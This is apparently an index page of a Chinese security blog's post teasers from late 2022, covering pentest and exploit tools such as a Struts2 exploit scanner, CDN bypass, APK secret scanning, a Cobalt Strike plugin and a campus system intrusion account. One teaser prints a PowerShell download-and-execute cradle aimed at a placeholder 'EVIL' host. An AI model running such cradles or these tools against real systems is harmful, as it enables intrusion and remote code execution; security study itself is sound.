Struts2利用工具 Struts2漏洞利用扫描工具，基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具。参数说明Options:  -i, --info 漏洞信息介绍  -v, --version 显示工... 2022-10-9 08:33:3 | 阅读: 40 | 收藏 | 天驿安全 漏洞 struts2scan python3 vulhub 016

实战 | 记一次校内的XX系统渗透 首先进入主页是这个样子F12也没找到啥接口。爆破也没出来。注入也无。。。。陷入僵局。然后继续翻IP。搜到一个人力资源管理系统F12有惊喜。这里背景图片居然是download+id。然后顺势遍历一波ID... 2022-10-8 08:31:37 | 阅读: 16 | 收藏 | 天驿安全 cmdshell 数据 trwhere tt tmp1

信息收集-绕过CDN工具 Bypass_cdn 基于python3开发的信息收集工具，绕过CDN查找目标的真实IP地址。示例：python3 .\scan.py https://www.ghxi.com/python scan... 2022-10-7 08:32:45 | 阅读: 36 | 收藏 | 天驿安全 python3 bypass 谢谢 ghxi github

APK扫描工具APKLeaks APKLeaks 是一个开源的 apk 文件敏感信息扫描工具，通过扫描 APK 文件来获取 URI、端点和 secret 信息。安装方式下载安装$ git clone https://github.c... 2022-10-6 09:31:3 | 阅读: 39 | 收藏 | 天驿安全 apkleaks apk dwisiswant0 github 信息

今天，曝光这个号 2022-10-5 11:21:26 | 阅读: 24 | 收藏 | 天驿安全 安全

一些有趣的powershell加载命令 普通下载IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")PowerShell 3.0+IEX (iwr 'ht... 2022-10-4 08:31:2 | 阅读: 26 | 收藏 | 天驿安全 xmlhttp comobject nslookup

开源安全工具EasyPen EasyPen是使用Python + wxPython编写、提供简洁图形界面、支持跨平台的安全扫描工具，可用于企业内外网巡检、应急响应、白帽子对各SRC的持续检测。安装方式Windows 下载载运行生... 2022-10-3 08:30:31 | 阅读: 33 | 收藏 | 天驿安全 漏洞 medusa hydra github easypen

日常渗透刷洞的一些小工具 2022-10-2 08:31:42 | 阅读: 34 | 收藏 | 天驿安全 nuclei github pocscan wanli 漏洞

【干货】Spring框架漏洞渗透总结 Spring简介Spring是Java EE编程领域的一个轻量级开源框架，该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建，是为了解决企业级编程开发中的复杂性，业务逻辑层和其... 2022-10-1 08:32:8 | 阅读: 25 | 收藏 | 天驿安全 漏洞 sockjs 安全 远程 vulhub

一款用GO语言编写的JS爬取工具~ 分享一个自己在实战过程中用的比较顺手的JS爬取工具@Author: pingc0yhttps://github.com/pingc0y/URLFinderURLFinder是一款用于快速提取检测页面中... 2022-9-30 08:31:34 | 阅读: 8 | 收藏 | 天驿安全 urlfinder 0set goarch ldflags goos

干货|安全攻防知识库大集合 知识星球渗透知识库（HACK之道）汇集最全、最新的安全知识库，内容不限于红队攻防实战、内网渗透、代码审计、社工、安卓逆向、CTF比赛技巧、安全运维、应急响应、等保、企业安全建设、安全运营、漏洞复现、P... 2022-9-29 08:32:28 | 阅读: 9 | 收藏 | 天驿安全 安全 渗透 漏洞 汇集 最全

一款集合多功能的桌面安全工具SnowShadow（雪影） 一、介绍及项目地址：雪影，一款桌面软件，集成了IP查询，端口扫描，系统命令，Webshell，C段存活扫描，后台目录扫描，远程控制等功能，以后还会增加其它实用功能。项目地址：https://githu... 2022-9-28 08:30:40 | 阅读: 24 | 收藏 | 天驿安全 控制 远程 编解码 端口

零基础学黑客，该如何学习？附教程。 最近好朋友老李说他想转渗透测试。老李跟身边的人说了下想法，随后身边就围绕着各种声音，有支持的，也有劝退的。虽然他也有些纠结，但还是坚持了自己的想法，走上网安学习之路。其实近几年网络安全事件层出不穷，相... 2022-9-27 08:30:42 | 阅读: 15 | 收藏 | 天驿安全 安全 靶场 渗透 漏洞

OLa 一款cobalt strike后渗透模块插件 不了解cobalt strike的可参考如下文章：https://www.ddosi.org/?s=cobaltOLa（欧拉）介绍一款CS后渗透模块插件，让大家使用一款插件就够了，本插件集大家之所长（... 2022-9-25 08:32:28 | 阅读: 24 | 收藏 | 天驿安全 模块 github d3ckx1 ola ddosi

WEB渗透测试之三大漏扫神器 通过踩点和查点，已经能确定渗透的目标网站。接下来可以选择使用漏扫工具进行初步的检测，可以极大的提高工作的效率。功欲善其事必先利其器，下面介绍三款适用于企业级漏洞扫描的软件1.AWVSAWVS （ Ac... 2022-9-24 08:31:14 | 阅读: 27 | 收藏 | 天驿安全 安全 漏洞 webinspect awvs 自动化

高效资产收集工具 -- Kunyu 一、工具介绍Kunyu (坤舆)，名字取自 <坤舆万国全图> ，测绘实际上是一个地理信息相关的专业学科，针对海里的、陆地的、天上的地理信息进行盘点。同样应用于网络空间，发现未知、脆弱的资产也是如此，更... 2022-9-22 08:32:47 | 阅读: 34 | 收藏 | 天驿安全 网络 坤舆 信息 knownsec

信息泄露扫描工具 -- BBScan 2.0 项目作者：lijiejie项目地址：https://github.com/lijiejie/BBScan一、工具介绍BBScan 是一个高并发、轻量级的信息泄露扫描工具。它可以在短时间内完成数十万目标... 2022-9-21 08:32:58 | 阅读: 35 | 收藏 | 天驿安全 bbscan 信息 自动化 lijiejie

网络安全考证备考交流群 2022-9-20 08:32:44 | 阅读: 13 | 收藏 | 天驿安全 安全 收录于 合集 考证 务必

基于业务场景的漏洞挖掘方法 随着WAF产品从传统规则库到智能引擎的转型，通用漏洞类型已基本可以防护。但WAF的局限性也在于只能防御流量层面的攻击，难以防御业务逻辑型的漏洞。而如今大部分企业在Web应用层的防护主要依赖WAF，往往... 2022-9-20 08:32:42 | 阅读: 11 | 收藏 | 天驿安全 漏洞 spf 信息 伪造 挖掘

一款扩展性高的渗透测试框架 -- MYExploit 项目作者：achuna33项目地址：https://github.com/achuna33/MYExploit一、工具介绍一款扩展性高的渗透测试框架，可能出现的几个问题：1.卡死？重启应用解决90%问... 2022-9-19 08:31:20 | 阅读: 23 | 收藏 | 天驿安全 连带 achuna33 github 代理